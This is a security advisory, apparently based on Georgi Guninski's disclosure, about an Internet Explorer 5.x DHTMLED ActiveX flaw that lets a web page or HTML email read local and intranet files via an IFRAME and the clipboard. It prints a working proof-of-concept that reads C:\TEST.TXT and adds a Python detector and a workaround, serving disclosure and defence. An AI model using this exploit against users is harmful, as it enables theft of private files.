COMMAND
IE
SYSTEMS AFFECTED
IE 5.5, 5.01
PROBLEM
The following is based on a Georgi Guninski security advisory. The
affected systems are IE 5.5 and 5.01 (Win98); the problem was also
confirmed on IE 5.0 (5.00.2314.1003) on Win95b and on IE 4.0
(4.72.3612.1713), also on Win95b. Other versions are probably
affected as well, but they have not been tested. Glen Morgon
confirmed it on IE 5.0 (5.00.2919.6307) on NT4.0 (4.00.1381).
Internet Explorer 5.5 and 5.01 under Windows 98 (all other versions
are presumably also vulnerable) allow a web page to read text files
and parsed HTML files, both from the local disk and from any host. A
particular danger is reading parsed web pages from intranet web
servers behind a firewall. It is also exploitable from an HTML email
message in Outlook. This is achieved with the DHTMLED ActiveX control.
The problem lies in DHTMLED (DHTML Edit Control Safe for Scripting
for IE5), which is used for basic HTML editing. It allows opening a
page containing an IFRAME, but it does not enforce DOM protection
properly. It is possible to select the content of the IFRAME (which
may be a document residing anywhere, including on the local disk),
copy it to the clipboard and then read it back from the clipboard.
It seems likely that DHTMLED in combination with an IFRAME may lead
to further, more dangerous security risks.
The code is:
------dh2.html--------------------------------
<SCRIPT>
// Note: the OBJECT element hosting the DHTMLED control (id "dh") and the
// S1 element that receives the paste are not shown in this listing.
alert("This page reads C:\\TEST.TXT\nYou may need to create it.");
function f1()
{
// Focus the IFRAME inside the control's document, then select and copy its
// contents: the control does not enforce the usual DOM protection here.
dh.DOM.all.I1.focus();
dh.DOM.all.I1.document.execCommand("selectall");
dh.DOM.all.I1.document.execCommand("copy");
// Paste the clipboard into an element the page can read from script.
r=document.all.S1.createTextRange();
r.execCommand("paste");
alert("Here is your file: "+S1.value);
}
function loadit()
{
// Load the page containing the IFRAME into the DHTMLED control.
dh.loadURL("http://www.nat.bg/~joro/ifr2.html");
// ^^^^^^^^^^^^^^ You may need to edit this
// Give the control time to load the page before reading from it.
setTimeout("f1()",5000);
}
setTimeout("loadit();",1000);
</SCRIPT>
---------------------------------------------------
---------ifr2.html---------------------------------
<HTML>
<IFRAME SRC="file://c:/test.txt" ID="I1" name="I1">
</IFRAME>
</HTML>
Demonstration is available at:
http://www.nat.bg/~joro/dh2.html
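As an added example, not part of the original advisory, a small Python scanner that flags an HTML body (for instance an incoming HTML mail) combining the indicators described above: a DHTMLED loadURL() call, clipboard copy and paste through execCommand, and an IFRAME pointing at a local file. The sample documents are constructed from the advisory's listings; the example.invalid host is an assumption.

```python
import re
from html.parser import HTMLParser
# Constructed sample: the advisory's dh2.html script and ifr2.html IFRAME in one
# body (the <OBJECT> hosting DHTMLED is not on the page, so we key on script calls).
SUSPICIOUS = r"""<HTML><SCRIPT>
function f1() { dh.DOM.all.I1.focus();
  dh.DOM.all.I1.document.execCommand("selectall");
  dh.DOM.all.I1.document.execCommand("copy");
  document.all.S1.createTextRange().execCommand("paste"); }
function loadit() { dh.loadURL("http://example.invalid/ifr2.html"); setTimeout("f1()", 5000); }
setTimeout("loadit();", 1000);
</SCRIPT><IFRAME SRC="file://c:/test.txt" ID="I1"></IFRAME></HTML>"""

# Constructed benign sample: a remote IFRAME and an unremarkable script.
BENIGN = """<HTML><SCRIPT>document.title = "hello";</SCRIPT>
<IFRAME SRC="http://example.invalid/news.html"></IFRAME></HTML>"""
class _Collector(HTMLParser):
    # Gathers script bodies (delivered by HTMLParser as CDATA) and IFRAME src values.
    def __init__(self):
        super().__init__()
        self.in_script, self.scripts, self.iframe_srcs = False, [], []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        elif tag == "iframe":
            self.iframe_srcs.append((dict(attrs).get("src") or "").strip())
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)

def analyze(html):
    """Return the indicators found in one HTML body; an empty list means none."""
    p = _Collector()
    p.feed(html)
    js = "\n".join(p.scripts)
    reasons = []
    if re.search(r"\.loadURL\s*\(", js):
        reasons.append("DHTMLED loadURL() loads a document into the editing control")
    if re.search(r"""execCommand\s*\(\s*["']copy["']""", js, re.I):
        reasons.append("script copies editor content to the clipboard")
    if re.search(r"""execCommand\s*\(\s*["']paste["']""", js, re.I):
        reasons.append("script pastes the clipboard into a script-readable element")
    local = [s for s in p.iframe_srcs if s.lower().startswith("file:")]
    if local:
        reasons.append("IFRAME targets a local file: " + ", ".join(local))
    return reasons
```

A single indicator (a remote IFRAME, or a lone paste) is common in legitimate pages; it is the combination that matches the technique in this advisory.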
SOLUTION
Disable Active Scripting, or disable "Run ActiveX controls and
plug-ins" (there are probably other workarounds).